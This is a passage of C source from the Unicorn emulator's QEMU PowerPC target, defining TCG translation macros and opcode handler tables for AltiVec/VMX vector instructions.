GEN_VXFORM_ENV(vpkuhus, 7, 2); GEN_VXFORM_ENV(vpkuwus, 7, 3); GEN_VXFORM_ENV(vpkudus, 7, 19); GEN_VXFORM_ENV(vpkshus, 7, 4); GEN_VXFORM_ENV(vpkswus, 7, 5); GEN_VXFORM_ENV(vpksdus, 7, 21); GEN_VXFORM_ENV(vpkshss, 7, 6); GEN_VXFORM_ENV(vpkswss, 7, 7); GEN_VXFORM_ENV(vpksdss, 7, 23); GEN_VXFORM(vpkpx, 7, 12); GEN_VXFORM_ENV(vsum4ubs, 4, 24); GEN_VXFORM_ENV(vsum4sbs, 4, 28); GEN_VXFORM_ENV(vsum4shs, 4, 25); GEN_VXFORM_ENV(vsum2sws, 4, 26); GEN_VXFORM_ENV(vsumsws, 4, 30); GEN_VXFORM_ENV(vaddfp, 5, 0); GEN_VXFORM_ENV(vsubfp, 5, 1); GEN_VXFORM_ENV(vmaxfp, 5, 16); GEN_VXFORM_ENV(vminfp, 5, 17); GEN_VXFORM_HETRO(vextublx, 6, 24) GEN_VXFORM_HETRO(vextuhlx, 6, 25) GEN_VXFORM_HETRO(vextuwlx, 6, 26) GEN_VXFORM_TRANS_DUAL(vmrgow, PPC_NONE, PPC2_ALTIVEC_207, vextuwlx, PPC_NONE, PPC2_ISA300) GEN_VXFORM_HETRO(vextubrx, 6, 28) GEN_VXFORM_HETRO(vextuhrx, 6, 29) GEN_VXFORM_HETRO(vextuwrx, 6, 30) GEN_VXFORM_TRANS(lvsl, 6, 31) GEN_VXFORM_TRANS(lvsr, 6, 32) GEN_VXFORM_TRANS_DUAL(vmrgew, PPC_NONE, PPC2_ALTIVEC_207, vextuwrx, PPC_NONE, PPC2_ISA300) #define GEN_VXRFORM1(opname, name, str, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##opname(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXRFORM(name, opc2, opc3) \ GEN_VXRFORM1(name, name, #name, opc2, opc3) \ GEN_VXRFORM1(name##_dot, name##_, #name ".", opc2, (opc3 | (0x1 << 4))) /* * Support for Altivec instructions that use bit 31 (Rc) as an opcode * bit but also use bit 21 as an actual Rc bit. In general, thse pairs * come from different versions of the ISA, so we must also support a * pair of flags for each instruction. */ #define GEN_VXRFORM_DUAL(name0, flg0, flg2_0, name1, flg1, flg2_1) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0))) { \ if (Rc21(ctx->opcode) == 0) { \ gen_##name0(ctx); \ } else { \ gen_##name0##_(ctx); \ } \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1))) { \ if (Rc21(ctx->opcode) == 0) { \ gen_##name1(ctx); \ } else { \ gen_##name1##_(ctx); \ } \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } GEN_VXRFORM(vcmpequb, 3, 0) GEN_VXRFORM(vcmpequh, 3, 1) GEN_VXRFORM(vcmpequw, 3, 2) GEN_VXRFORM(vcmpequd, 3, 3) GEN_VXRFORM(vcmpnezb, 3, 4) GEN_VXRFORM(vcmpnezh, 3, 5) GEN_VXRFORM(vcmpnezw, 3, 6) GEN_VXRFORM(vcmpgtsb, 3, 12) GEN_VXRFORM(vcmpgtsh, 3, 13) GEN_VXRFORM(vcmpgtsw, 3, 14) GEN_VXRFORM(vcmpgtsd, 3, 15) GEN_VXRFORM(vcmpgtub, 3, 8) GEN_VXRFORM(vcmpgtuh, 3, 9) GEN_VXRFORM(vcmpgtuw, 3, 10) GEN_VXRFORM(vcmpgtud, 3, 11) GEN_VXRFORM(vcmpeqfp, 3, 3) GEN_VXRFORM(vcmpgefp, 3, 7) GEN_VXRFORM(vcmpgtfp, 3, 11) GEN_VXRFORM(vcmpbfp, 3, 15) GEN_VXRFORM(vcmpneb, 3, 0) GEN_VXRFORM(vcmpneh, 3, 1) GEN_VXRFORM(vcmpnew, 3, 2) GEN_VXRFORM_DUAL(vcmpequb, PPC_ALTIVEC, PPC_NONE, \ vcmpneb, PPC_NONE, PPC2_ISA300) GEN_VXRFORM_DUAL(vcmpequh, PPC_ALTIVEC, PPC_NONE, \ vcmpneh, PPC_NONE, PPC2_ISA300) GEN_VXRFORM_DUAL(vcmpequw, PPC_ALTIVEC, PPC_NONE, \ vcmpnew, PPC_NONE, PPC2_ISA300) GEN_VXRFORM_DUAL(vcmpeqfp, PPC_ALTIVEC, PPC_NONE, \ vcmpequd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXRFORM_DUAL(vcmpbfp, PPC_ALTIVEC, PPC_NONE, \ vcmpgtsd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXRFORM_DUAL(vcmpgtfp, PPC_ALTIVEC, PPC_NONE, \ vcmpgtud, PPC_NONE, PPC2_ALTIVEC_207) #define GEN_VXFORM_DUPI(name, tcg_op, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int simm; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ simm = SIMM5(ctx->opcode); \ tcg_op(tcg_ctx, avr_full_offset(rD(ctx->opcode)), 16, 16, simm);\ } GEN_VXFORM_DUPI(vspltisb, tcg_gen_gvec_dup8i, 6, 12); GEN_VXFORM_DUPI(vspltish, tcg_gen_gvec_dup16i, 6, 13); GEN_VXFORM_DUPI(vspltisw, tcg_gen_gvec_dup32i, 6, 14); #define GEN_VXFORM_NOA(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_NOA_ENV(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_NOA_2(name, opc2, opc3, opc4) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_NOA_3(name, opc2, opc3, opc4) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_gpr[rD(ctx->opcode)], rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } GEN_VXFORM_NOA(vupkhsb, 7, 8); GEN_VXFORM_NOA(vupkhsh, 7, 9); GEN_VXFORM_NOA(vupkhsw, 7, 25); GEN_VXFORM_NOA(vupklsb, 7, 10); GEN_VXFORM_NOA(vupklsh, 7, 11); GEN_VXFORM_NOA(vupklsw, 7, 27); GEN_VXFORM_NOA(vupkhpx, 7, 13); GEN_VXFORM_NOA(vupklpx, 7, 15); GEN_VXFORM_NOA_ENV(vrefp, 5, 4); GEN_VXFORM_NOA_ENV(vrsqrtefp, 5, 5); GEN_VXFORM_NOA_ENV(vexptefp, 5, 6); GEN_VXFORM_NOA_ENV(vlogefp, 5, 7); GEN_VXFORM_NOA_ENV(vrfim, 5, 11); GEN_VXFORM_NOA_ENV(vrfin, 5, 8); GEN_VXFORM_NOA_ENV(vrfip, 5, 10); GEN_VXFORM_NOA_ENV(vrfiz, 5, 9); GEN_VXFORM_NOA(vprtybw, 1, 24); GEN_VXFORM_NOA(vprtybd, 1, 24); GEN_VXFORM_NOA(vprtybq, 1, 24); static void gen_vsplt(DisasContext *ctx, int vece) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int uimm, dofs, bofs; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } uimm = UIMM5(ctx->opcode); bofs = avr_full_offset(rB(ctx->opcode)); dofs = avr_full_offset(rD(ctx->opcode)); /* Experimental testing shows that hardware masks the immediate. */ bofs += (uimm << vece) & 15; #ifndef HOST_WORDS_BIGENDIAN bofs ^= 15; bofs &= ~((1 << vece) - 1); #endif tcg_gen_gvec_dup_mem(tcg_ctx, vece, dofs, bofs, 16, 16); } #define GEN_VXFORM_VSPLT(name, vece, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) { gen_vsplt(ctx, vece); } #define GEN_VXFORM_UIMM_ENV(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ TCGv_i32 uimm; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ uimm = tcg_const_i32(tcg_ctx, UIMM5(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, rb, uimm); \ tcg_temp_free_i32(tcg_ctx, uimm); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_UIMM_SPLAT(name, opc2, opc3, splat_max) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ uint8_t uimm = UIMM4(ctx->opcode); \ TCGv_i32 t0; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ if (uimm > splat_max) { \ uimm = 0; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_movi_i32(tcg_ctx, t0, uimm); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, rb, t0); \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } GEN_VXFORM_VSPLT(vspltb, MO_8, 6, 8); GEN_VXFORM_VSPLT(vsplth, MO_16, 6, 9); GEN_VXFORM_VSPLT(vspltw, MO_32, 6, 10); GEN_VXFORM_UIMM_SPLAT(vextractub, 6, 8, 15); GEN_VXFORM_UIMM_SPLAT(vextractuh, 6, 9, 14); GEN_VXFORM_UIMM_SPLAT(vextractuw, 6, 10, 12); GEN_VXFORM_UIMM_SPLAT(vextractd, 6, 11, 8); GEN_VXFORM_UIMM_SPLAT(vinsertb, 6, 12, 15); GEN_VXFORM_UIMM_SPLAT(vinserth, 6, 13, 14); GEN_VXFORM_UIMM_SPLAT(vinsertw, 6, 14, 12); GEN_VXFORM_UIMM_SPLAT(vinsertd, 6, 15, 8); GEN_VXFORM_UIMM_ENV(vcfux, 5, 12); GEN_VXFORM_UIMM_ENV(vcfsx, 5, 13); GEN_VXFORM_UIMM_ENV(vctuxs, 5, 14); GEN_VXFORM_UIMM_ENV(vctsxs, 5, 15); GEN_VXFORM_DUAL(vspltb, PPC_ALTIVEC, PPC_NONE, vextractub, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vsplth, PPC_ALTIVEC, PPC_NONE, vextractuh, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltw, PPC_ALTIVEC, PPC_NONE, vextractuw, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltisb, PPC_ALTIVEC, PPC_NONE, vinsertb, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltish, PPC_ALTIVEC, PPC_NONE, vinserth, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltisw, PPC_ALTIVEC, PPC_NONE, vinsertw, PPC_NONE, PPC2_ISA300); static void gen_vsldoi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rb, rd; TCGv_i32 sh; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); sh = tcg_const_i32(tcg_ctx, VSH(ctx->opcode)); gen_helper_vsldoi(tcg_ctx, rd, ra, rb, sh); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rb); tcg_temp_free_ptr(tcg_ctx, rd); tcg_temp_free_i32(tcg_ctx, sh); } #define GEN_VAFORM_PAIRED(name0, name1, opc2) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rc, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ if (Rc(ctx->opcode)) { \ gen_helper_##name1(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb, rc); \ } else { \ gen_helper_##name0(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb, rc); \ } \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rc); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } GEN_VAFORM_PAIRED(vmhaddshs, vmhraddshs, 16) static void gen_vmladduhm(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rb, rc, rd; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); gen_helper_vmladduhm(tcg_ctx, rd, ra, rb, rc); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rb); tcg_temp_free_ptr(tcg_ctx, rc); tcg_temp_free_ptr(tcg_ctx, rd); } static void gen_vpermr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rb, rc, rd; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); gen_helper_vpermr(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb, rc); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rb); tcg_temp_free_ptr(tcg_ctx, rc); tcg_temp_free_ptr(tcg_ctx, rd); } GEN_VAFORM_PAIRED(vmsumubm, vmsummbm, 18) GEN_VAFORM_PAIRED(vmsumuhm, vmsumuhs, 19) GEN_VAFORM_PAIRED(vmsumshm, vmsumshs, 20) GEN_VAFORM_PAIRED(vsel, vperm, 21) GEN_VAFORM_PAIRED(vmaddfp, vnmsubfp, 23) GEN_VXFORM_NOA(vclzb, 1, 28) GEN_VXFORM_NOA(vclzh, 1, 29) GEN_VXFORM_TRANS(vclzw, 1, 30) GEN_VXFORM_TRANS(vclzd, 1, 31) GEN_VXFORM_NOA_2(vnegw, 1, 24, 6) GEN_VXFORM_NOA_2(vnegd, 1, 24, 7) GEN_VXFORM_NOA_2(vextsb2w, 1, 24, 16) GEN_VXFORM_NOA_2(vextsh2w, 1, 24, 17) GEN_VXFORM_NOA_2(vextsb2d, 1, 24, 24) GEN_VXFORM_NOA_2(vextsh2d, 1, 24, 25) GEN_VXFORM_NOA_2(vextsw2d, 1, 24, 26) GEN_VXFORM_NOA_2(vctzb, 1, 24, 28) GEN_VXFORM_NOA_2(vctzh, 1, 24, 29) GEN_VXFORM_NOA_2(vctzw, 1, 24, 30) GEN_VXFORM_NOA_2(vctzd, 1, 24, 31) GEN_VXFORM_NOA_3(vclzlsbb, 1, 24, 0) GEN_VXFORM_NOA_3(vctzlsbb, 1, 24, 1) GEN_VXFORM_NOA(vpopcntb, 1, 28) GEN_VXFORM_NOA(vpopcnth, 1, 29) GEN_VXFORM_NOA(vpopcntw, 1, 30) GEN_VXFORM_NOA(vpopcntd, 1, 31) GEN_VXFORM_DUAL(vclzb, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcntb, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vclzh, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcnth, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vclzw, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcntw, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vclzd, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcntd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vbpermd, 6, 23); GEN_VXFORM(vbpermq, 6, 21); GEN_VXFORM_TRANS(vgbbd, 6, 20); GEN_VXFORM(vpmsumb, 4, 16) GEN_VXFORM(vpmsumh, 4, 17) GEN_VXFORM(vpmsumw, 4, 18) GEN_VXFORM(vpmsumd, 4, 19) #define GEN_BCD(op) \ static void gen_##op(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rd; \ TCGv_i32 ps; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ \ ps = tcg_const_i32(tcg_ctx, (ctx->opcode & 0x200) != 0); \ \ gen_helper_##op(tcg_ctx, cpu_crf[6], rd, ra, rb, ps); \ \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_i32(tcg_ctx, ps); \ } #define GEN_BCD2(op) \ static void gen_##op(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rd, rb; \ TCGv_i32 ps; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ \ ps = tcg_const_i32(tcg_ctx, (ctx->opcode & 0x200) != 0); \ \ gen_helper_##op(tcg_ctx, cpu_crf[6], rd, rb, ps); \ \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_i32(tcg_ctx, ps); \ } GEN_BCD(bcdadd) GEN_BCD(bcdsub) GEN_BCD2(bcdcfn) GEN_BCD2(bcdctn) GEN_BCD2(bcdcfz) GEN_BCD2(bcdctz) GEN_BCD2(bcdcfsq) GEN_BCD2(bcdctsq) GEN_BCD2(bcdsetsgn) GEN_BCD(bcdcpsgn); GEN_BCD(bcds); GEN_BCD(bcdus); GEN_BCD(bcdsr); GEN_BCD(bcdtrunc); GEN_BCD(bcdutrunc); static void gen_xpnd04_1(DisasContext *ctx) { switch (opc4(ctx->opcode)) { case 0: gen_bcdctsq(ctx); break; case 2: gen_bcdcfsq(ctx); break; case 4: gen_bcdctz(ctx); break; case 5: gen_bcdctn(ctx); break; case 6: gen_bcdcfz(ctx); break; case 7: gen_bcdcfn(ctx); break; case 31: gen_bcdsetsgn(ctx); break; default: gen_invalid(ctx); break; } } static void gen_xpnd04_2(DisasContext *ctx) { switch (opc4(ctx->opcode)) { case 0: gen_bcdctsq(ctx); break; case 2: gen_bcdcfsq(ctx); break; case 4: gen_bcdctz(ctx); break; case 6: gen_bcdcfz(ctx); break; case 7: gen_bcdcfn(ctx); break; case 31: gen_bcdsetsgn(ctx); break; default: gen_invalid(ctx); break; } } GEN_VXFORM_DUAL(vsubcuw, PPC_ALTIVEC, PPC_NONE, \ xpnd04_1, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubsws, PPC_ALTIVEC, PPC_NONE, \ xpnd04_2, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsububm, PPC_ALTIVEC, PPC_NONE, \ bcdadd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vsububs, PPC_ALTIVEC, PPC_NONE, \ bcdadd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vsubuhm, PPC_ALTIVEC, PPC_NONE, \ bcdsub, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vsubuhs, PPC_ALTIVEC, PPC_NONE, \ bcdsub, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vaddshs, PPC_ALTIVEC, PPC_NONE, \ bcdcpsgn, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubudm, PPC2_ALTIVEC_207, PPC_NONE, \ bcds, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubuwm, PPC_ALTIVEC, PPC_NONE, \ bcdus, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubsbs, PPC_ALTIVEC, PPC_NONE, \ bcdtrunc, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubuqm, PPC2_ALTIVEC_207, PPC_NONE, \ bcdtrunc, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubcuq, PPC2_ALTIVEC_207, PPC_NONE, \ bcdutrunc, PPC_NONE, PPC2_ISA300) static void gen_vsbox(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rd; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); gen_helper_vsbox(tcg_ctx, rd, ra); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rd); } GEN_VXFORM(vcipher, 4, 20) GEN_VXFORM(vcipherlast, 4, 20) GEN_VXFORM(vncipher, 4, 21) GEN_VXFORM(vncipherlast, 4, 21) GEN_VXFORM_DUAL(vcipher, PPC_NONE, PPC2_ALTIVEC_207, vcipherlast, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vncipher, PPC_NONE, PPC2_ALTIVEC_207, vncipherlast, PPC_NONE, PPC2_ALTIVEC_207) #define VSHASIGMA(op) \ static void gen_##op(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rd; \ TCGv_i32 st_six; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ st_six = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##op(tcg_ctx, rd, ra, st_six); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_i32(tcg_ctx, st_six); \ } VSHASIGMA(vshasigmaw) VSHASIGMA(vshasigmad) GEN_VXFORM3(vpermxor, 22, 0xFF) GEN_VXFORM_DUAL(vsldoi, PPC_ALTIVEC, PPC_NONE, vpermxor, PPC_NONE, PPC2_ALTIVEC_207) #undef GEN_VR_LDX #undef GEN_VR_STX #undef GEN_VR_LVE #undef GEN_VR_STVE #undef GEN_VX_LOGICAL #undef GEN_VX_LOGICAL_207 #undef GEN_VXFORM #undef GEN_VXFORM_207 #undef GEN_VXFORM_DUAL #undef GEN_VXRFORM_DUAL #undef GEN_VXRFORM1 #undef GEN_VXRFORM #undef GEN_VXFORM_DUPI #undef GEN_VXFORM_NOA #undef GEN_VXFORM_UIMM #undef GEN_VAFORM_PAIRED #undef GEN_BCD2 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/vmx-ops.inc.c�����������������������������������������������0000664�0000000�0000000�00000030471�14675241067�0022552�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#define GEN_VR_LDX(name, opc2, opc3) \ GEN_HANDLER(name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) #define GEN_VR_STX(name, opc2, opc3) \ GEN_HANDLER(st##name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) #define GEN_VR_LVE(name, opc2, opc3) \ GEN_HANDLER(lve##name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) #define GEN_VR_STVE(name, opc2, opc3) \ GEN_HANDLER(stve##name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) GEN_VR_LDX(lvx, 0x07, 0x03), GEN_VR_LDX(lvxl, 0x07, 0x0B), GEN_VR_LVE(bx, 0x07, 0x00), GEN_VR_LVE(hx, 0x07, 0x01), GEN_VR_LVE(wx, 0x07, 0x02), GEN_VR_STX(svx, 0x07, 0x07), GEN_VR_STX(svxl, 0x07, 0x0F), GEN_VR_STVE(bx, 0x07, 0x04), GEN_VR_STVE(hx, 0x07, 0x05), GEN_VR_STVE(wx, 0x07, 0x06), #define GEN_VX_LOGICAL(name, tcg_op, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_ALTIVEC) #define GEN_VX_LOGICAL_207(name, tcg_op, opc2, opc3) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ALTIVEC_207) GEN_VX_LOGICAL(vand, tcg_gen_and_i64, 2, 16), GEN_VX_LOGICAL(vandc, tcg_gen_andc_i64, 2, 17), GEN_VX_LOGICAL(vor, tcg_gen_or_i64, 2, 18), GEN_VX_LOGICAL(vxor, tcg_gen_xor_i64, 2, 19), GEN_VX_LOGICAL(vnor, tcg_gen_nor_i64, 2, 20), GEN_VX_LOGICAL_207(veqv, tcg_gen_eqv_i64, 2, 26), GEN_VX_LOGICAL_207(vnand, tcg_gen_nand_i64, 2, 22), GEN_VX_LOGICAL_207(vorc, tcg_gen_orc_i64, 2, 21), #define GEN_VXFORM(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_ALTIVEC) #define GEN_VXFORM_207(name, opc2, opc3) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ALTIVEC_207) #define GEN_VXFORM_300(name, opc2, opc3) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, 0x00000000, PPC_NONE, 